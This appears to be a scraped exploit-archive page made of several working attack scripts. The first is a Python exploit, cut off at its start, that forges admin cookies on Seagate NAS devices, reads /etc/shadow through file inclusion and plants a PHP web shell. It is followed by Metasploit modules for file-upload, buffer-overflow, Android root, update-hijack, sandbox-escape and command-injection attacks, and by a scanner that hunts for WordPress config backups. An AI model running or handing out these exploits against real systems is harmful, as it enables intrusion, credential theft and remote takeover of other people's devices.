post_data = None): method = 'GET' if not headers: headers = {} headers['Host'] = host if 'User-Agent' not in headers: headers['User-Agent'] = DEFAULT_UA if 'Accept' not in headers: headers['Accept'] = 'text/html' if post_data: method = 'POST' post_data = urllib.urlencode(post_data) headers['Content-Type'] = 'application/x-www-form-urlencoded' if ci_session: ci_session = urllib.quote(base64.b64encode(encode(ci_session))) headers['Cookie'] = 'ci_session={0}'.format(ci_session) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) http = "" http += "{0} {1} HTTP/1.1\r\n".format(method, uri) for h in headers: http += "{0}: {1}\r\n".format(h, headers[h]) if post_data: http += "Content-Length: {0}\r\n".format(len(post_data)) http += "\r\n" if post_data: http += post_data s.send(http) result = "" while True: data = s.recv(1024) if not data: break result += data s.close() return result def get_ci_session(): resp = make_request() for l in resp.split("\r\n"): m = re.findall("Set-Cookie: ([a-zA-Z0-9_\-]+)=([a-zA-Z0-9\+%=/]+);", l) for name, value in m: if name == 'ci_session' and len(value) > 40: return decode(base64.b64decode(urllib.unquote(value))) print "Unable to establish session with {0}".format(host) sys.exit(1) def add_string(ci_session, key, value): prefix = 's:{0}:"{1}";s:'.format(len(key), key) if prefix in ci_session: ci_session = re.sub(r'{0}\d+:"[^"]*"'.format(prefix), '{0}{1}:"{2}"'.format(prefix, len(value), value), ci_session) else: # doesn't exist, so we need to add it to the start and the end. count = int(ci_session.split(':')[1]) + 1 ci_session = re.sub(r'a:\d+(.*)}$', r'a:{0}\1{1}{2}:"{3}";}}'.format(count, prefix, len(value), value), ci_session) return ci_session def set_admin(ci_session): return add_string(ci_session, "is_admin", "yes") def set_language(ci_session, lang): return add_string(ci_session, "language", lang) def include_file(ci_session, file_path): if file_path[0] == '/': file_path = '../../../../../..' + file_path return set_language(ci_session, file_path + "\x00") def read_file(file_path, post_data = None): resp = make_request(ci_session = include_file(cis, file_path), headers = {}, post_data = post_data) return resp def hashdump(): shadow = read_file('/etc/shadow') for l in shadow.split("\n"): if l and ':!:' not in l and ':' not in l: parts = l.split(':') print "{0}:{1}".format(parts[0], parts[1]) def cmd(command): headers = { 'Content-Type' : 'application/x-www-form-urlencoded', 'Accept' : '*/*', 'User-Agent' : DEFAULT_UA } post_data = urllib.urlencode({'c' : command}) headers['Content-Type'] = 'application/x-www-form-urlencoded' ci_session = urllib.quote(base64.b64encode(encode(cis))) headers['Cookie'] = 'ci_session={0}'.format(ci_session) url = 'http://{0}:{1}/{2}'.format(host, port, webshell) req = urllib2.Request(url, headers = headers, data = post_data) return urllib2.urlopen(req).read() def shell(): running = True while running: c = raw_input("Shell ({0}) $ ".format(post_id)) if c != 'quit' and c != 'exit': cmd(c) else: running = False def show_admin_cookie(user_agent): ci_session = add_string(cis, 'is_admin', 'yes') ci_session = add_string(ci_session, 'username', 'admin') ci_session = add_string(ci_session, 'user_agent', user_agent) ci_session = urllib.quote(base64.b64encode(encode(ci_session))) print "Session cookies are bound to the browser's user agent." print "Using user agent: " + user_agent print "ci_session=" + ci_session def show_version(): print "Firmware Version: {0}".format(get_firmware_version()) def show_cookie(): print cis def show_help(): print "" print "Seagape v1.0 -- Interactive Seagate NAS Webshell" print " - OJ Reeves (@TheColonial) - https://beyondbinary.io/" print " - https://beyondbinary.io/bbsec/001" print "===========================================================================" print "version - Print the current firmware version to screen." print "dumpcookie - Print the current cookie to screen." print "admincookie <ua> - Create an admin login cookie (ua == user agent string)." print " Add to your browser and access ANY NAS box as admin." print "help - Show this help." print "exit / quit - Run for the hills." print "<anything else> - Execute the command on the server." print "" def execute(user_input): result = True parts = user_input.split(' ') c = parts[0] if c == 'admincookie': ua = DEFAULT_UA if len(parts) > 1: ua = ' '.join(parts[1:]) show_admin_cookie(ua) elif c == 'dumpcookie': show_cookie() elif c == 'version': show_version() elif c == 'help': show_help() elif c == 'quit' or c == 'exit': remove_shell() result = False else: print cmd(user_input) return result def get_firmware_version(): resp = make_request("/index.php/mv_system/get_firmware?_=1413463189043", ci_session = acis) return resp.replace("\r", "").replace("\n", "").split("version")[1][1:-2] def install_shell(): resp = make_request("/index.php/mv_system/get_general_setup?_=1413463189043", ci_session = acis) existing_setup = '' for l in resp.split("\r\n"): if 'general_setup' in l: existing_setup = l break # generate the shell and its installer exec_post = base64.b64encode("<?php if(isset($_POST['c'])&&!empty($_POST['c'])){system($_POST['c']);} ?>") installer = '<?php file_put_contents(\'{0}\', base64_decode(\'{1}\')); ?>'.format(webshell, exec_post) write_php = xml.sax.saxutils.quoteattr(installer)[1:-1] start = existing_setup.index('" description="') + 15 end = existing_setup.index('"', start) updated_setup = existing_setup[0:start] + write_php + existing_setup[end:] # write the shell to the description resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043", ci_session = acis, headers = { }, post_data = { 'general_setup' : updated_setup }) # invoke the installer read_file(LFI_FILE) # remove the installer resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043", ci_session = acis, headers = { }, post_data = { 'general_setup' : existing_setup }) def remove_shell(): return cmd('rm -f {0}'.format(webshell)) print "Establishing session with {0} ...".format(host) cis = get_ci_session() if len(sys.argv) >= 4 and sys.argv[3] == '-c': ua = DEFAULT_UA if len(sys.argv) > 4: ua = sys.argv[4] show_admin_cookie(ua) else: print "Configuring administrative access ..." acis = add_string(cis, 'is_admin', 'yes') acis = add_string(acis, 'username', 'admin') print "Installing web shell (takes a while) ..." install_shell() print "Extracting id and hostname ..." identity = cmd('whoami').strip() hostname = cmd('cat /etc/hostname').strip() show_help() running = True while running: try: user_input = raw_input("Seagape ({0}@{1})> ".format(identity, hostname)) running = execute(user_input) except: print "Something went wrong. Try again." Source

.

## # This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'socket' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::HTTP::Wordpress def initialize(info = {}) super(update_info( info, 'Name' => 'WordPress Holding Pattern Theme Arbitrary File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in all versions of the Holding Pattern theme found in the upload_file.php script which contains no session or file validation. It allows unauthenticated users to upload files of any type and subsequently execute PHP scripts in the context of the web server. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alexander Borg', # Vulnerability disclosure 'Rob Carr <rob[at]rastating.com>' # Metasploit module ], 'References' => [ ['CVE', '2015-1172'], ['WPVDB', '7784'], ['URL', 'http://packetstormsecurity.com/files/130282/WordPress-Holding-Pattern-0.6-Shell-Upload.html'] ], 'DisclosureDate' => 'Feb 11 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['holding_pattern', {}]], 'DefaultTarget' => 0 )) end def rhost datastore['RHOST'] end def holding_pattern_uploads_url normalize_uri(wordpress_url_themes, 'holding_pattern', 'uploads/') end def holding_pattern_uploader_url normalize_uri(wordpress_url_themes, 'holding_pattern', 'admin', 'upload-file.php') end def generate_mime_message(payload, payload_name) data = Rex::MIME::Message.new target_ip = IPSocket.getaddress(rhost) field_name = Rex::Text.md5(target_ip) data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"") data end def exploit print_status("#{peer} - Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha(10)}.php" data = generate_mime_message(payload, payload_name) print_status("#{peer} - Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => holding_pattern_uploader_url, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s ) fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 payload_url = normalize_uri(holding_pattern_uploads_url, payload_name) print_status("#{peer} - Executing the payload at #{payload_url}") register_files_for_cleanup(payload_name) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end end Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => "X360 VideoPlayer ActiveX Control Buffer Overflow", 'Description' => %q{ This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the X360 Software. By setting an overly long value to 'ConvertFile()',an attacker can overrun a .data buffer to bypass ASLR/DEP and finally execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Rh0', # vulnerability discovery and exploit, all the hard work 'juan vazquez' # msf module ], 'References' => [ ['EDB', '35948'], ['URL', 'https://rh0dev.github.io/blog/2015/fun-with-info-leaks/'] ], 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'PrependEncoder' => stack_adjust }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Arch' => ARCH_X86, 'BrowserRequirements' => { :source => /script|headers/i, :clsid => "{4B3476C6-185A-4D19-BB09-718B565FA67B}", :os_name => OperatingSystems::Match::WINDOWS, :ua_name => Msf::HttpClients::IE, :ua_ver => '10.0' }, 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Jan 30 2015", 'DefaultTarget' => 0)) end def stack_adjust adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset adjust end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") case request.uri when /exploit.js/ print_status("Sending exploit.js...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'} send_exploit_html(cli, exploit_template(cli, target_info), headers) when /sprayer.js/ print_status("Sending sprayer.js...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'} send_exploit_html(cli, sprayer_template(cli, target_info), headers) when /informer.js/ print_status("Sending informer.js...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'} send_exploit_html(cli, informer_template(cli, target_info), headers) when /rop_builder.js/ print_status("Sending rop_builder.js...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'} send_exploit_html(cli, rop_builder_template(cli, target_info), headers) else print_status("Sending main.html...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'text/html'} send_exploit_html(cli, main_template(cli, target_info), headers) end end def main_template(cli, target_info) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'main.html') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def exploit_template(cli, target_info) shellcode = Rex::Text.to_hex(get_payload(cli, target_info)) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'exploit.js') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def sprayer_template(cli, target_info) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'sprayer.js') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def informer_template(cli, target_info) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'informer.js') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def rop_builder_template(cli, target_info) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'rop_builder.js') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def strip_comments(input) input.gsub(/\/\/.*$/, '') end end Source

## # This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'uri' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info( info, 'Name' => 'Maarch LetterBox 2.8 Unrestricted File Upload', 'Description' => %q{ This module exploits a file upload vulnerability on Maarch LetterBox 2.8 due to a lack of session and file validation in the file_to_index.php script. It allows unauthenticated users to upload files of any type and subsequently execute PHP scripts in the context of the web server. }, 'License' => MSF_LICENSE, 'Author' => [ 'Rob Carr <rob[at]rastating.com>' ], 'References' => [ ['CVE', '2015-1587'] ], 'DisclosureDate' => 'Feb 11 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['Maarch LetterBox 2.8', {}]], 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The base path to Maarch LetterBox', '/']) ], self.class) end def letterbox_login_url normalize_uri(target_uri.path, 'login.php') end def letterbox_upload_url normalize_uri(target_uri.path, 'file_to_index.php') end def check res = send_request_cgi('method' => 'GET', 'uri' => letterbox_login_url) if res.nil? || res.code != 200 return Msf::Exploit::CheckCode::Unknown elsif res.body.include?('alt="Maarch Maerys Archive v2.1 logo"') return Msf::Exploit::CheckCode::Appears end Msf::Exploit::CheckCode::Safe end def generate_mime_message(payload, name) data = Rex::MIME::Message.new data.add_part(payload.encoded, 'text/plain', 'binary', "form-data; name=\"file\"; filename=\"#{name}\"") data end def exploit print_status("#{peer} - Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha(10)}.php" data = generate_mime_message(payload, payload_name) print_status("#{peer} - Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => letterbox_upload_url, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s ) fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 print_status("#{peer} - Parsing server response...") captures = res.body.match(/\[local_path\] => (.*\.php)/i).captures fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') if captures.nil? || captures[0].nil? payload_url = normalize_uri(target_uri.path, captures[0]) print_good("#{peer} - Response parsed successfully") print_status("#{peer} - Executing the payload at #{payload_url}") register_files_for_cleanup(File.basename(URI.parse(payload_url).path)) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end end Source

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Common def initialize(info={}) super( update_info( info, { 'Name' => 'Android futex requeue kernel exploit', 'Description' => %q{ This module exploits a bug in futex_requeue in the linux kernel. Any android phone with a kernel built before June 2014 should be vulnerable. }, 'License' => MSF_LICENSE, 'Author' => [ 'Pinkie Pie', #discovery 'geohot', #towelroot 'timwr' #metasploit module ], 'References' => [ [ 'CVE', '2014-3153' ], [ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ], [ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ], ], 'SessionTypes' => [ 'meterpreter' ], 'Platform' => 'android', 'Targets' => [[ 'Automatic', { }]], 'Arch' => ARCH_DALVIK, 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', }, 'DefaultTarget' => 0 } )) register_options([ OptString.new("WritableDir", [ true, "Temporary directory to write files", "/data/local/tmp/" ]), ], self.class) end def put_local_file(remotefile) localfile = File.join( Msf::Config.data_directory, "exploits", "CVE-2014-3153.elf" ) data = File.read(localfile, {:mode => 'rb'}) write_file(remotefile, data) end def exploit workingdir = session.fs.dir.getwd exploitfile = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}" payloadfile = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}" put_local_file(exploitfile) cmd_exec('/system/bin/chmod 700 ' + exploitfile) write_file(payloadfile, payload.raw) tmpdir = datastore['WritableDir'] rootclassdir = "#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}" rootpayload = "#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}.jar" rootcmd = " mkdir #{rootclassdir} && " rootcmd += "cd #{rootclassdir} && " rootcmd += "cp " + payloadfile + " #{rootpayload} && " rootcmd += "chmod 766 #{rootpayload} && " rootcmd += "dalvikvm -Xbootclasspath:/system/framework/core.jar -cp #{rootpayload} com.metasploit.stage.Payload" process = session.sys.process.execute(exploitfile, rootcmd, {'Hidden' => true, 'Channelized' => true}) process.channel.read end end Source

import re , urllib2 , sys, urllib lista = [] backup = ['wp-config.php~','wp-config.php.bak','wp-config.bak','wp-config.php-bak','/wp-content/uploads/blog-backup.txt'] def unique(seq): seen = set() return [seen.add(x) or x for x in seq if x not in seen] def grabwp(ip): try: s = ip page = 1 print('\n') while page <= 21: bing = "http://www.bing.com/search?q=ip%3A"+s+"+?page_id=&count=50&first="+str(page) openbing = urllib2.urlopen(bing) readbing = openbing.read() findwebs = re.findall('<h2><a href="(.*?)"' , readbing) for i in range(len(findwebs)): wpnoclean = findwebs[i] findwp = re.findall('(.*?)\?page_id=', wpnoclean) lista.extend(findwp) page = page + 10 except IndexError: pass def searchbackup(site, config): try : read = urllib2.urlopen(site + "/" + config).read() rs = re.findall("USER",read) if rs : print "BACKUP FILE > " + site + "/" + config except : pass def scan(): final = unique(lista) for site in final : for config in backup : searchbackup(site, config) print "\!/ Server Wordpress Backup Files Scanner By YASSINOX.TN !/" print '' ip = raw_input("Server Ip Adress : ") grabwp(ip) final = unique(lista) print "Done ! Grabbed " + str(len(final) ) + " Wordpress Sites On This Server" print "---------------------------------------------------" scan() print "---------------------------------------------------"

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpServer VERSION_REGEX = /\/v2\/(mbam|mbae)\/consumer\/version.chk/ EXE_REGEX = /\/v2\/(mbam|mbae)\/consumer\/data\/(mbam|mbae)-setup-(.*)\.exe/ NEXT_VERSION = { mbam: '2.0.3.1025', mbae: '1.04.1.1012' } def initialize(info = {}) super(update_info(info, 'Name' => 'Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in the update functionality of Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes Anti-Exploit consumer 1.03.1.1220. Due to the lack of proper update package validation a man-in-the-middle attacker could execute arbitrary code by spoofing the update server data-cdn.mbamupdates.com and uploading an executable. This module has been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220. }, 'License' => MSF_LICENSE, 'Author' => [ 'Yonathan Klijnsma', # Vulnerability discovery and PoC 'Gabor Seljan', # Metasploit module 'todb' # Module refactoring ], 'References' => [ [ 'CVE', '2014-4936' ], [' OSVDB', '116050'], [ 'URL', 'http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and'] # Discoverer's blog ], 'DefaultOptions' => { 'EXITFUNC' => 'process' }, 'Platform' => 'win', 'Targets' => [ [ 'Windows Universal', {} ] ], 'Privileged' => false, 'DisclosureDate' => 'Dec 16 2014', 'DefaultTarget' => 0 )) register_options( [ OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]), OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ]) ], self.class) # Vulnerable Malwarebytes clients do not allow altering these. deregister_options('SSL', 'SSLVersion', 'SSLCert') end def on_request_uri(cli, request) case request.uri when VERSION_REGEX serve_update_notice(cli) if set_exploit_target($1, request) when EXE_REGEX serve_exploit(cli) else vprint_status "Sending empty page for #{request.uri}" serve_default_response(cli) end end def serve_default_response(cli) send_response(cli, '') end def check_client_version(request) return false unless request['User-Agent'] =~ /base:(\d+\.\d+\.\d+\.\d+)/ this_version = $1 next_version = NEXT_VERSION[:mbam] if Gem::Version.new(next_version) >= Gem::Version.new(this_version) return true else print_error "Version #{this_version} of Anti-Malware isn't vulnerable, not attempting update." return false end end def set_exploit_target(package, request) case package when /mbam/i if check_client_version(request) @client_software = ['Anti-Malware', NEXT_VERSION[:mbam]] else serve_default_response(cli) return false end when /mbae/i # We don't get identifying info from MBAE @client_software = ['Anti-Exploit', NEXT_VERSION[:mbae]] end end def serve_update_notice(cli) software,next_version = @client_software print_status "Updating #{software} to (fake) #{next_version}. The user may need to click 'OK'." send_response(cli, next_version, 'Content-Type' => 'application/octet-stream' ) end def serve_exploit(cli) print_status "Sending payload EXE..." send_response(cli, generate_payload_exe, 'Content-Type' => 'application/x-msdos-program' ) end end Source

.

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Exploit::Powershell def initialize(info={}) super(update_info(info, { 'Name' => 'MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape', 'Description' => %q{ This module abuses a process creation policy in Internet Explorer's sandbox, specifically the Microsoft Remote Desktop Services Web Proxy IE one, which allows the attacker to escape the Protected Mode, and execute code with Medium Integrity. At the moment, this module only bypass Protected Mode on Windows 7 SP1 and prior (32 bits). This module has been tested successfully on Windows 7 SP1 (32 bits) with IE 8 and IE 11. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # From Threat Intel of Symantec 'Henry Li', # Public vulnerability analysis 'juan vazquez' # Metasploit module ], 'Platform' => 'win', 'SessionTypes' => ['meterpreter'], 'Arch' => [ARCH_X86], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'WfsDelay' => 30 }, 'Targets' => [ [ 'Protected Mode (Windows 7) / 32 bits', { 'Arch' => ARCH_X86 } ] ], 'DefaultTarget' => 0, 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ ['CVE', '2015-0016'], ['MSB', 'MS15-004'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explorer-sandbox/'] ], 'DisclosureDate' => 'Jan 13 2015' })) end def check temp = get_env('WINDIR') dll_path = "#{temp}\\System32\\TSWbPrxy.exe" win_ver = sysinfo['OS'] unless win_ver =~ /Windows Vista|Windows 2008|Windows 2012|Windows [78]/ return Exploit::CheckCode::Safe end unless file_exist?(dll_path) return Exploit::CheckCode::Safe end Exploit::CheckCode::Detected end def exploit print_status('Checking target...') unless check == Exploit::CheckCode::Detected fail_with(Failure::NotVulnerable, 'System not vulnerable') end if session.platform !~ /^x86\// fail_with(Failure::NotVulnerable, 'Sorry, this module currently only allows x86/win32 sessions at the moment') end win_ver = sysinfo['OS'] if win_ver =~ /Windows 2012|Windows 8/ fail_with(Failure::NotVulnerable, 'This module doesn\'t run on Windows 8/2012 at the moment') end print_status('Checking the Process Integrity Level...') unless get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NotVulnerable, 'Not running at Low Integrity') end cmd = cmd_psh_payload( payload.encoded, payload_instance.arch.first, { :remove_comspec => true } ) print_status('Storing payload on environment variable...') cmd.gsub!('powershell.exe ','') session.railgun.kernel32.SetEnvironmentVariableA('PSHCMD', cmd) print_status('Exploiting...') temp = get_env('TEMP') # Using the old meterpreter loader, if it's loaded with # Reflective DLL Injection the exceptions in the sandbox # policy won't apply. session.core.load_library( 'LibraryFilePath' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0016', 'cve-2015-0016.dll'), 'TargetFilePath' => temp + '\\cve-2015-0016.dll', 'UploadLibrary' => true, 'Extension' => false, 'SaveToDisk' => false ) end def cleanup session.railgun.kernel32.SetEnvironmentVariableA('PSHCMD', nil) super end end Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Arris VAP2500 tools_command.php Command Execution', 'Description' => %q{ Arris VAP2500 access points are vulnerable to OS command injection in the web management portal via the tools_command.php page. Though authentication is required to access this page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid username. }, 'Author' => [ 'HeadlessZeke' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-8423'], ['CVE', '2014-8424'], ['OSVDB', '115045'], ['OSVDB', '115046'], ['BID', '71297'], ['BID', '71299'], ['URL', 'http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/'] ], 'DisclosureDate' => 'Nov 25 2014', 'Privileged' => true, 'Payload' => { 'DisableNops' => true, 'Space' => 1024, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet' } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0 )) end def check begin res = send_request_raw({ 'method' => 'GET', 'uri' => '/tools_command.php', 'cookie' => "p=#{Rex::Text.md5('super')}" }) if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/ return Exploit::CheckCode::Vulnerable end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") if datastore['PAYLOAD'] == 'cmd/unix/generic' exploit_cmd else exploit_session end end def exploit_cmd beg_boundary = rand_text_alpha(8) end_boundary = rand_text_alpha(8) begin res = send_request_cgi({ 'uri' => normalize_uri('/', 'tools_command.php'), 'vars_post' => { 'cmb_header' => '', 'txt_command' => "echo #{beg_boundary}; #{payload.encoded}; echo #{end_boundary}" }, 'method' => 'POST', 'cookie' => "p=#{Rex::Text.md5('super')}" }) if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/ print_good("#{peer} - Command sent successfully") if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m print_status("#{peer} - Command output: #{$1}") end else fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed") end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end def exploit_session begin send_request_cgi({ 'uri' => normalize_uri('/', 'tools_command.php'), 'vars_post' => { 'cmb_header' => '', 'txt_command' => "#{payload.encoded}" }, 'method' => 'POST', 'cookie' => "p=#{Rex::Text.md5('super')}" }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end Source